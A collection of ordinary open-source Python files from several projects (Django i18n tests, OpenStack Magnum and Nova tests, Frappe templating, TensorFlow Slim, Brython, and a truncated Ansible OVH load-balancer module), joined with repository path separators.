"""Behavior is correct if --no-location switch isn't specified."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=False)
self.assertTrue(os.path.exists(self.PO_FILE))
# #16903 -- Standard comment with source file relative path should be present
self.assertLocationCommentPresent(self.PO_FILE, 'Translatable literal #6b', 'templates', 'test.html')
# #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
self.assertLocationCommentNotPresent(self.PO_FILE, None, 'templates', 'test.html.py')
class KeepPotFileExtractorTests(ExtractorTests):
POT_FILE = 'locale/django.pot'
def tearDown(self):
super(KeepPotFileExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.unlink(self.POT_FILE)
except OSError:
pass
os.chdir(self._cwd)
def test_keep_pot_disabled_by_default(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_explicitly_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=False)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=[LOCALE], verbosity=0,
keep_pot=True)
self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
LOCALES = ['pt', 'de', 'ch']
def tearDown(self):
super(MultipleLocaleExtractionTests, self).tearDown()
os.chdir(self.test_dir)
for locale in self.LOCALES:
try:
self._rmrf('locale/%s' % locale)
except OSError:
pass
os.chdir(self._cwd)
def test_multiple_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
class ExcludedLocaleExtractionTests(ExtractorTests):
LOCALES = ['en', 'fr', 'it']
PO_FILE = 'locale/%s/LC_MESSAGES/django.po'
test_dir = os.path.abspath(os.path.join(this_directory, 'exclude'))
def _set_times_for_all_po_files(self):
"""
Set access and modification times to the Unix epoch time for all the .po files.
"""
for locale in self.LOCALES:
os.utime(self.PO_FILE % locale, (0, 0))
def setUp(self):
super(ExcludedLocaleExtractionTests, self).setUp()
os.chdir(self.test_dir) # ExtractorTests.tearDown() takes care of restoring.
shutil.copytree('canned_locale', 'locale')
self._set_times_for_all_po_files()
self.addCleanup(self._rmrf, os.path.join(self.test_dir, 'locale'))
def test_command_help(self):
with captured_stdout(), captured_stderr():
# `call_command` bypasses the parser; by calling
# `execute_from_command_line` with the help subcommand we
# ensure that there are no issues with the parser itself.
execute_from_command_line(['django-admin', 'help', 'makemessages'])
def test_one_locale_excluded(self):
management.call_command('makemessages', exclude=['it'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded(self):
management.call_command('makemessages', exclude=['it', 'fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_one_locale_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr'], exclude=['fr'], stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
def test_multiple_locales_excluded_with_locale(self):
management.call_command('makemessages', locale=['en', 'fr', 'it'], exclude=['fr', 'it'],
stdout=StringIO())
self.assertRecentlyModified(self.PO_FILE % 'en')
self.assertNotRecentlyModified(self.PO_FILE % 'fr')
self.assertNotRecentlyModified(self.PO_FILE % 'it')
class CustomLayoutExtractionTests(ExtractorTests):
def setUp(self):
super(CustomLayoutExtractionTests, self).setUp()
self.test_dir = os.path.join(this_directory, 'project_dir')
def test_no_locale_raises(self):
os.chdir(self.test_dir)
with six.assertRaisesRegex(self, management.CommandError,
"Unable to find a locale path to store translations for file"):
management.call_command('makemessages', locale=LOCALE, verbosity=0)
@override_settings(
LOCALE_PATHS=[os.path.join(this_directory, 'project_dir', 'project_locale')],
)
def test_project_locale_paths(self):
"""
Test that:
* translations for an app containing a locale folder are stored in that folder
* translations outside of that app are in LOCALE_PATHS[0]
"""
os.chdir(self.test_dir)
self.addCleanup(shutil.rmtree,
os.path.join(settings.LOCALE_PATHS[0], LOCALE), True)
self.addCleanup(shutil.rmtree,
os.path.join(self.test_dir, 'app_with_locale', 'locale', LOCALE), True)
management.call_command('makemessages', locale=[LOCALE], verbosity=0)
project_de_locale = os.path.join(
self.test_dir, 'project_locale', 'de', 'LC_MESSAGES', 'django.po')
app_de_locale = os.path.join(
self.test_dir, 'app_with_locale', 'locale', 'de', 'LC_MESSAGES', 'django.po')
self.assertTrue(os.path.exists(project_de_locale))
self.assertTrue(os.path.exists(app_de_locale))
with open(project_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has no locale directory', po_contents)
self.assertMsgId('This is a project-level string', po_contents)
with open(app_de_locale, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This app has a locale directory', po_contents)
|
Alzon/SUR | refs/heads/SURmagnum | magnum/tests/unit/objects/test_container.py | 15 | # Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from testtools.matchers import HasLength
from magnum.common import utils as magnum_utils
from magnum import objects
from magnum.tests.unit.db import base
from magnum.tests.unit.db import utils
class TestContainerObject(base.DbTestCase):
def setUp(self):
super(TestContainerObject, self).setUp()
self.fake_container = utils.get_test_container()
def test_get_by_id(self):
container_id = self.fake_container['id']
with mock.patch.object(self.dbapi, 'get_container_by_id',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_id(self.context,
container_id)
mock_get_container.assert_called_once_with(self.context,
container_id)
self.assertEqual(self.context, container._context)
def test_get_by_uuid(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_uuid(self.context, uuid)
mock_get_container.assert_called_once_with(self.context, uuid)
self.assertEqual(self.context, container._context)
def test_get_by_name(self):
name = self.fake_container['name']
with mock.patch.object(self.dbapi, 'get_container_by_name',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
container = objects.Container.get_by_name(self.context, name)
mock_get_container.assert_called_once_with(self.context, name)
self.assertEqual(self.context, container._context)
def test_list(self):
with mock.patch.object(self.dbapi, 'get_container_list',
autospec=True) as mock_get_list:
mock_get_list.return_value = [self.fake_container]
containers = objects.Container.list(self.context)
self.assertEqual(mock_get_list.call_count, 1)
self.assertThat(containers, HasLength(1))
self.assertIsInstance(containers[0], objects.Container)
self.assertEqual(self.context, containers[0]._context)
def test_create(self):
with mock.patch.object(self.dbapi, 'create_container',
autospec=True) as mock_create_container:
mock_create_container.return_value = self.fake_container
container = objects.Container(self.context, **self.fake_container)
container.create()
mock_create_container.assert_called_once_with(self.fake_container)
self.assertEqual(self.context, container._context)
def test_destroy(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
with mock.patch.object(self.dbapi, 'destroy_container',
autospec=True) as mock_destroy_container:
container = objects.Container.get_by_uuid(self.context, uuid)
container.destroy()
mock_get_container.assert_called_once_with(self.context, uuid)
mock_destroy_container.assert_called_once_with(uuid)
self.assertEqual(self.context, container._context)
def test_save(self):
uuid = self.fake_container['uuid']
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
autospec=True) as mock_get_container:
mock_get_container.return_value = self.fake_container
with mock.patch.object(self.dbapi, 'update_container',
autospec=True) as mock_update_container:
container = objects.Container.get_by_uuid(self.context, uuid)
container.image = 'container.img'
container.save()
mock_get_container.assert_called_once_with(self.context, uuid)
mock_update_container.assert_called_once_with(
uuid, {'image': 'container.img'})
self.assertEqual(self.context, container._context)
def test_refresh(self):
uuid = self.fake_container['uuid']
new_uuid = magnum_utils.generate_uuid()
returns = [dict(self.fake_container, uuid=uuid),
dict(self.fake_container, uuid=new_uuid)]
expected = [mock.call(self.context, uuid),
mock.call(self.context, uuid)]
with mock.patch.object(self.dbapi, 'get_container_by_uuid',
side_effect=returns,
autospec=True) as mock_get_container:
container = objects.Container.get_by_uuid(self.context, uuid)
self.assertEqual(uuid, container.uuid)
container.refresh()
self.assertEqual(new_uuid, container.uuid)
self.assertEqual(expected, mock_get_container.call_args_list)
self.assertEqual(self.context, container._context)
|
indictranstech/trufil-frappe | refs/heads/develop | frappe/website/template.py | 3 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import get_full_index
from frappe import _
from jinja2.utils import concat
from jinja2 import meta
import re
def build_template(context):
"""Returns a dict of block name and its rendered content"""
out = {}
render_blocks(context["template"], out, context)
# set_sidebar(out, context)
set_breadcrumbs(out, context)
set_title_and_header(out, context)
# meta
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
add_index(out, context)
# render
content_context = {}
content_context.update(context)
content_context.update(out)
out["content"] = frappe.get_template("templates/includes/page_content.html").render(content_context)
separate_style_and_script(out, context)
add_hero(out, context)
return out
def render_blocks(template_path, out, context):
"""Build the template block by block from the main template."""
env = frappe.get_jenv()
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
render_blocks(referenced_template_path, out, context)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
new_context = template.new_context(context)
out[block] = concat(render(new_context))
def separate_style_and_script(out, context):
"""Extract `style` and `script` tags into separate blocks"""
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
def set_breadcrumbs(out, context):
"""Build breadcrumbs template (deprecated)"""
out["no_breadcrumbs"] = context.get("no_breadcrumbs", 0) \
or ("<!-- no-breadcrumbs -->" in out.get("content", ""))
if out["no_breadcrumbs"]:
out["breadcrumbs"] = ""
elif "breadcrumbs" not in out:
out["breadcrumbs"] = frappe.get_template("templates/includes/breadcrumbs.html").render(context)
def set_title_and_header(out, context):
"""Extract and set title and header from content or context."""
out["no_header"] = context.get("no_header", 0) or ("<!-- no-header -->" in out.get("content", ""))
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "title" not in out:
out["title"] = context.get("title")
if context.get("page_titles") and context.page_titles.get(context.pathname):
out["title"] = context.page_titles.get(context.pathname)[0]
# header
if out["no_header"]:
out["header"] = ""
else:
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if not out.get("header") and "<h1" not in out.get("content", ""):
if out.get("title"):
out["header"] = out["title"]
if out.get("header") and not re.findall("<h.>", out["header"]):
out["header"] = "<h1>" + out["header"] + "</h1>"
if not out.get("header"):
out["no_header"] = 1
out["title"] = strip_html(out.get("title") or "")
def set_sidebar(out, context):
"""Include sidebar (deprecated)"""
out["has_sidebar"] = not (context.get("no_sidebar", 0) or ("<!-- no-sidebar -->" in out.get("content", "")))
if out.get("has_sidebar"):
out["sidebar"] = frappe.get_template("templates/includes/sidebar.html").render(context)
def add_index(out, context):
"""Add index, next button if `{index}`, `{next}` is present."""
# table of contents
extn = ""
if context.page_links_with_extn:
extn = ".html"
if "{index}" in out.get("content", "") and context.get("children") and len(context.children):
full_index = get_full_index(context.pathname, extn = extn)
if full_index:
html = frappe.get_template("templates/includes/full_index.html").render({
"full_index": full_index,
"url_prefix": context.url_prefix
})
out["content"] = out["content"].replace("{index}", html)
# next and previous
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
next_item.extn = "" if context.doc.has_children(next_item.name) else extn
if context.relative_links:
next_item.name = next_item.page_name or ""
else:
if next_item and next_item.name and next_item.name[0]!="/":
next_item.name = "/" + next_item.name
if next_item and next_item.name:
if not next_item.title:
next_item.title = ""
html = ('<p class="btn-next-wrapper"><a class="btn-next" href="{name}{extn}">'\
+_("Next")+': {title}</a></p>').format(**next_item)
else:
html = ""
out["content"] = out["content"].replace("{next}", html)
def add_hero(out, context):
"""Add a hero element if specified in content or hooks.
Hero elements get full page width."""
out["hero"] = ""
if "<!-- start-hero -->" in out["content"]:
parts1 = out["content"].split("<!-- start-hero -->")
parts2 = parts1[1].split("<!-- end-hero -->")
out["content"] = parts1[0] + parts2[1]
out["hero"] = parts2[0]
elif context.hero and context.hero.get(context.pathname):
out["hero"] = frappe.render_template(context.hero[context.pathname][0], context)
|
kirillzhuravlev/numpy | refs/heads/master | numpy/distutils/tests/swig_ext/setup.py | 135 | #!/usr/bin/env python
from __future__ import division, print_function
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('swig_ext', parent_package, top_path)
config.add_extension('_example',
['src/example.i', 'src/example.c']
)
config.add_extension('_example2',
['src/zoo.i', 'src/zoo.cc'],
depends=['src/zoo.h'],
include_dirs=['src']
)
config.add_data_dir('tests')
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(configuration=configuration)
|
xq262144/hue | refs/heads/master | desktop/core/ext-py/Django-1.6.10/tests/user_commands/management/commands/leave_locale_alone_true.py | 67 | from django.core.management.base import BaseCommand
from django.utils import translation
class Command(BaseCommand):
can_import_settings = True
leave_locale_alone = True
def handle(self, *args, **options):
return translation.get_language()
|
glovebx/odoo | refs/heads/8.0 | addons/website_mail/models/email_template.py | 151 | # -*- coding: utf-8 -*-
from openerp.osv import osv
from openerp.tools.translate import _
class EmailTemplate(osv.Model):
_inherit = 'email.template'
def action_edit_html(self, cr, uid, ids, context=None):
if not len(ids) == 1:
raise ValueError('One and only one ID allowed for this action')
if not context.get('params'):
action_id = self.pool['ir.model.data'].xmlid_to_res_id(cr, uid, 'mass_mailing.action_email_template_marketing')
else:
action_id = context['params']['action']
url = '/website_mail/email_designer?model=email.template&res_id=%d&return_action=%d&enable_editor=1' % (ids[0], action_id)
return {
'name': _('Edit Template'),
'type': 'ir.actions.act_url',
'url': url,
'target': 'self',
}
|
akash1808/nova_test_latest | refs/heads/master | nova/tests/unit/test_configdrive2.py | 44 | # Copyright 2012 Michael Still and Canonical Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import tempfile
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_utils import fileutils
from nova import context
from nova import test
from nova.tests.unit import fake_instance
from nova import utils
from nova.virt import configdrive
CONF = cfg.CONF
class FakeInstanceMD(object):
def metadata_for_config_drive(self):
yield ('this/is/a/path/hello', 'This is some content')
class ConfigDriveTestCase(test.NoDBTestCase):
def test_create_configdrive_iso(self):
CONF.set_override('config_drive_format', 'iso9660')
imagefile = None
try:
self.mox.StubOutWithMock(utils, 'execute')
utils.execute('genisoimage', '-o', mox.IgnoreArg(), '-ldots',
'-allow-lowercase', '-allow-multidot', '-l',
'-publisher', mox.IgnoreArg(), '-quiet', '-J', '-r',
'-V', 'config-2', mox.IgnoreArg(), attempts=1,
run_as_root=False).AndReturn(None)
self.mox.ReplayAll()
with configdrive.ConfigDriveBuilder(FakeInstanceMD()) as c:
(fd, imagefile) = tempfile.mkstemp(prefix='cd_iso_')
os.close(fd)
c.make_drive(imagefile)
finally:
if imagefile:
fileutils.delete_if_exists(imagefile)
def test_create_configdrive_vfat(self):
CONF.set_override('config_drive_format', 'vfat')
imagefile = None
try:
self.mox.StubOutWithMock(utils, 'mkfs')
self.mox.StubOutWithMock(utils, 'execute')
self.mox.StubOutWithMock(utils, 'trycmd')
utils.mkfs('vfat', mox.IgnoreArg(),
label='config-2').AndReturn(None)
utils.trycmd('mount', '-o', mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg(),
run_as_root=True).AndReturn((None, None))
utils.execute('umount', mox.IgnoreArg(),
run_as_root=True).AndReturn(None)
self.mox.ReplayAll()
with configdrive.ConfigDriveBuilder(FakeInstanceMD()) as c:
(fd, imagefile) = tempfile.mkstemp(prefix='cd_vfat_')
os.close(fd)
c.make_drive(imagefile)
# NOTE(mikal): we can't check for VFAT output here because the
# filesystem creation stuff has been mocked out, as it requires
# root permissions
finally:
if imagefile:
fileutils.delete_if_exists(imagefile)
def test_config_drive_required_by_image_property(self):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
inst.system_metadata = {
utils.SM_IMAGE_PROP_PREFIX + 'img_config_drive': 'mandatory'}
self.assertTrue(configdrive.required_by(inst))
inst.system_metadata = {
utils.SM_IMAGE_PROP_PREFIX + 'img_config_drive': 'optional'}
self.assertFalse(configdrive.required_by(inst))
@mock.patch.object(configdrive, 'required_by', return_value=False)
def test_config_drive_update_instance_required_by_false(self,
mock_required):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
configdrive.update_instance(inst)
self.assertEqual('', inst.config_drive)
inst.config_drive = True
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
@mock.patch.object(configdrive, 'required_by', return_value=True)
def test_config_drive_update_instance(self, mock_required):
inst = fake_instance.fake_instance_obj(context.get_admin_context())
inst.config_drive = ''
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
inst.config_drive = True
configdrive.update_instance(inst)
self.assertTrue(inst.config_drive)
|
meteorcloudy/tensorflow | refs/heads/master | tensorflow/contrib/slim/python/slim/data/data_provider.py | 145 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains code for the DataProvider.
A DataProvider is a class which provides some predefined data types from some
source (TFRecord, etc). The most basic function of a
data provider is the `Get` operation where one requests one or more types of
data, or 'items':
provider.get(items=['image', 'sentence', 'class'])
More concretely, a data provider (a subclass of BaseDataProvider) returns a
single tensor for each requested item (data type):
provider = MyDataProvider(...)
image, sentence, clazz = provider.get(['image', 'sentence', 'class'])
In this example, the provider `MyDataProvider` must know how to load each item.
A data provider may be written in a way that the logic necessary to map from
each item to tensor is completely encapsulated within the data_provider itself.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
class DataProvider(object):
"""Maps a list of requested data items to tensors from a data source.
All data providers must inherit from DataProvider and implement the Get
method which returns arbitrary types of data. No assumption is made about the
source of the data nor the mechanism for providing it.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, items_to_tensors, num_samples):
"""Constructs the Data Provider.
Args:
items_to_tensors: a dictionary of names to tensors.
num_samples: the number of samples in the dataset being provided.
"""
self._items_to_tensors = items_to_tensors
self._num_samples = num_samples
def get(self, items):
"""Returns a list of tensors specified by the given list of items.
The list of items is arbitrary; different data providers satisfy different
lists of items. For example, the Pascal VOC provider might accept items 'image' and
'semantics', whereas the NYUDepthV2 data provider might accept items
'image', 'depths' and 'normals'.
Args:
items: a list of strings, each of which indicate a particular data type.
Returns:
a list of tensors, whose length matches the length of `items`, where each
tensor corresponds to each item.
Raises:
ValueError: if any of the items cannot be satisfied.
"""
self._validate_items(items)
return [self._items_to_tensors[item] for item in items]
def list_items(self):
"""Returns the list of item names that can be provided by the data provider.
Returns:
a list of item names that can be passed to Get([items]).
"""
return self._items_to_tensors.keys()
def num_samples(self):
"""Returns the number of data samples in the dataset.
Returns:
a positive whole number.
"""
return self._num_samples
def _validate_items(self, items):
"""Verifies that each given item is a member of the list from ListItems().
Args:
items: a list or tuple of strings.
Raises:
ValueError: if `items` is not a tuple or list or if any of the elements of
`items` is not found in the list provided by self.ListItems().
"""
if not isinstance(items, (list, tuple)):
raise ValueError('items must be a list or tuple')
valid_items = self.list_items()
for item in items:
if item not in valid_items:
raise ValueError('Item [%s] is invalid. Valid entries include: %s' %
(item, valid_items))
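A minimal, self-contained sketch of the `DataProvider` contract above, using plain Python objects in place of tensors (the `InMemoryProvider` name and its items are invented for illustration; no TensorFlow session is required):

```python
class InMemoryProvider:
    """Stand-in mirroring DataProvider's get()/list_items() behaviour."""

    def __init__(self, items_to_tensors, num_samples):
        self._items_to_tensors = items_to_tensors
        self._num_samples = num_samples

    def list_items(self):
        return list(self._items_to_tensors.keys())

    def num_samples(self):
        return self._num_samples

    def get(self, items):
        # Same validation logic as DataProvider._validate_items().
        if not isinstance(items, (list, tuple)):
            raise ValueError('items must be a list or tuple')
        for item in items:
            if item not in self._items_to_tensors:
                raise ValueError('Item [%s] is invalid. Valid entries include: %s'
                                 % (item, self.list_items()))
        return [self._items_to_tensors[item] for item in items]


provider = InMemoryProvider({'image': 'img0', 'class': 3}, num_samples=1)
image, clazz = provider.get(['image', 'class'])
```

Requesting an item that was never registered raises `ValueError`, matching the behaviour documented in `_validate_items`.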
|
2014cdag4/2014cdag4 | refs/heads/master | wsgi/static/Brython2.1.0-20140419-113919/Lib/_random.py | 115 | import _os
from os import urandom as _urandom
class Random:
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), and setstate().
Optionally, implement a getrandbits() method so that randrange()
can cover arbitrarily large ranges.
"""
#random
#seed
#getstate
#setstate
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self._state=x
def seed(self, a=None, version=2):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
For version 2 (the default), all of the bits are used if *a* is a str,
bytes, or bytearray. For version 1, the hash() of *a* is used instead.
If *a* is an int, all bits are used.
"""
self._state=a
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self._state
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
self._state=state
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return _os.random()
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates a long int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
numbytes = (k + 7) // 8 # bits / 8 and rounded up
x = int.from_bytes(_urandom(numbytes), 'big')
return x >> (numbytes * 8 - k) # trim excess bits
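The bit-trimming in `getrandbits()` above can be exercised standalone with `os.urandom` (a sketch only; it bypasses Brython's `_os`/`_urandom` shims and reproduces just the byte-rounding and shift logic):

```python
import os

def getrandbits(k):
    """Return a non-negative int built from exactly k random bits."""
    if k <= 0:
        raise ValueError('number of bits must be greater than zero')
    numbytes = (k + 7) // 8              # bits / 8, rounded up
    x = int.from_bytes(os.urandom(numbytes), 'big')
    return x >> (numbytes * 8 - k)       # trim excess high-order bits

# The result always fits in k bits, never more.
samples = [getrandbits(13) for _ in range(100)]
```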
|
toshywoshy/ansible | refs/heads/devel | lib/ansible/modules/cloud/ovh/ovh_ip_loadbalancing_backend.py | 3 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovh_ip_loadbalancing_backend
short_description: Manage OVH IP LoadBalancing backends
description:
- Manage OVH (French European hosting provider) LoadBalancing IP backends
version_added: "2.2"
author: Pascal Heraud (@pascalheraud)
notes:
- Uses the python OVH Api U(https://github.com/ovh/python-ovh).
You have to create an application (a key and secret) with a consumer
key as described in U(https://docs.ovh.com/gb/en/customer/first-steps-with-ovh-api/)
requirements:
- ovh > 0.3.5
options:
name:
required: true
description:
- The internal name of the LoadBalancing IP (ip-X.X.X.X)
backend:
required: true
description:
- The IP address of the backend to update / modify / delete
state:
default: present
choices: ['present', 'absent']
description:
- Determines whether the backend is to be created/modified
or deleted
probe:
default: 'none'
choices: ['none', 'http', 'icmp' , 'oco']
description:
- Determines the type of probe to use for this backend
weight:
default: 8
description:
- Determines the weight for this backend
endpoint:
required: true
description:
- The endpoint to use (for instance ovh-eu)
application_key:
required: true
description:
- The application key to use
application_secret:
required: true
description:
- The application secret to use
consumer_key:
required: true
description:
- The consumer key to use
timeout:
default: 120
description:
- The timeout in seconds used to wait for a task to be
completed.
'''
EXAMPLES = '''
# Adds or modify the backend '212.1.1.1' to a
# loadbalancing 'ip-1.1.1.1'
- ovh_ip_loadbalancing:
name: ip-1.1.1.1
backend: 212.1.1.1
state: present
probe: none
weight: 8
endpoint: ovh-eu
application_key: yourkey
application_secret: yoursecret
consumer_key: yourconsumerkey
# Removes a backend '212.1.1.1' from a loadbalancing 'ip-1.1.1.1'
- ovh_ip_loadbalancing:
name: ip-1.1.1.1
backend: 212.1.1.1
state: absent
endpoint: ovh-eu
application_key: yourkey
application_secret: yoursecret
consumer_key: yourconsumerkey
'''
RETURN = '''
'''
import time
try:
import ovh
import ovh.exceptions
from ovh.exceptions import APIError
HAS_OVH = True
except ImportError:
HAS_OVH = False
from ansible.module_utils.basic import AnsibleModule
def getOvhClient(ansibleModule):
endpoint = ansibleModule.params.get('endpoint')
application_key = ansibleModule.params.get('application_key')
application_secret = ansibleModule.params.get('application_secret')
consumer_key = ansibleModule.params.get('consumer_key')
return ovh.Client(
endpoint=endpoint,
application_key=application_key,
application_secret=application_secret,
consumer_key=consumer_key
)
def waitForNoTask(client, name, timeout):
currentTimeout = timeout
while len(client.get('/ip/loadBalancing/{0}/task'.format(name))) > 0:
time.sleep(1) # Delay for 1 sec
currentTimeout -= 1
if currentTimeout < 0:
return False
return True
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True),
backend=dict(required=True),
weight=dict(default=8, type='int'),
probe=dict(default='none',
choices=['none', 'http', 'icmp', 'oco']),
state=dict(default='present', choices=['present', 'absent']),
endpoint=dict(required=True),
application_key=dict(required=True, no_log=True),
application_secret=dict(required=True, no_log=True),
consumer_key=dict(required=True, no_log=True),
timeout=dict(default=120, type='int')
)
)
if not HAS_OVH:
module.fail_json(msg='ovh-api python module '
'is required to run this module')
# Get parameters
name = module.params.get('name')
state = module.params.get('state')
backend = module.params.get('backend')
weight = module.params.get('weight')
probe = module.params.get('probe')
timeout = module.params.get('timeout')
# Connect to OVH API
client = getOvhClient(module)
# Check that the load balancing exists
try:
loadBalancings = client.get('/ip/loadBalancing')
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of loadBalancing, '
'check application key, secret, consumerkey and parameters. '
'Error returned by OVH api was : {0}'.format(apiError))
if name not in loadBalancings:
module.fail_json(msg='IP LoadBalancing {0} does not exist'.format(name))
# Check that no task is pending before going on
try:
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for no pending '
'tasks before executing the module '.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of pending tasks '
'of the loadBalancing, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
try:
backends = client.get('/ip/loadBalancing/{0}/backend'.format(name))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the list of backends '
'of the loadBalancing, check application key, secret, consumerkey '
'and parameters. Error returned by OVH api was : {0}'
.format(apiError))
backendExists = backend in backends
moduleChanged = False
if state == "absent":
if backendExists:
# Remove backend
try:
client.delete(
'/ip/loadBalancing/{0}/backend/{1}'.format(name, backend))
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion '
'of removing backend task'.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for deleting the backend, '
'check application key, secret, consumerkey and '
'parameters. Error returned by OVH api was : {0}'
.format(apiError))
moduleChanged = True
else:
if backendExists:
# Get properties
try:
backendProperties = client.get(
'/ip/loadBalancing/{0}/backend/{1}'.format(name, backend))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for getting the backend properties, '
'check application key, secret, consumerkey and '
'parameters. Error returned by OVH api was : {0}'
.format(apiError))
if (backendProperties['weight'] != weight):
# Change weight
try:
client.post(
'/ip/loadBalancing/{0}/backend/{1}/setWeight'
.format(name, backend), weight=weight)
if not waitForNoTask(client, name, timeout):
module.fail_json(
msg='Timeout of {0} seconds while waiting for completion '
'of setWeight to backend task'
.format(timeout))
except APIError as apiError:
module.fail_json(
msg='Unable to call OVH api for updating the weight of the '
